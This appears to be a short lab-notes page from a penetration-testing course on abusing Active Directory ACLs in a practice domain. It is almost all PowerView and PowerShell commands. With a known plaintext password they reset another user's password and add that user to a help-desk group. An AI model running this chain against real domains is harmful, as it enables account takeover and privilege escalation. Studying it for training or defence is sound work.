ACL Abuse Tactics
$SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -ForceImport-Module .\PowerView.ps1 Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose # damundsenPassword -> new password object # Cred -> wley credintial
image.png $SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force $Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose # Cred2 -> damundsen credintial - secure object
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
Cleanup
Last updated

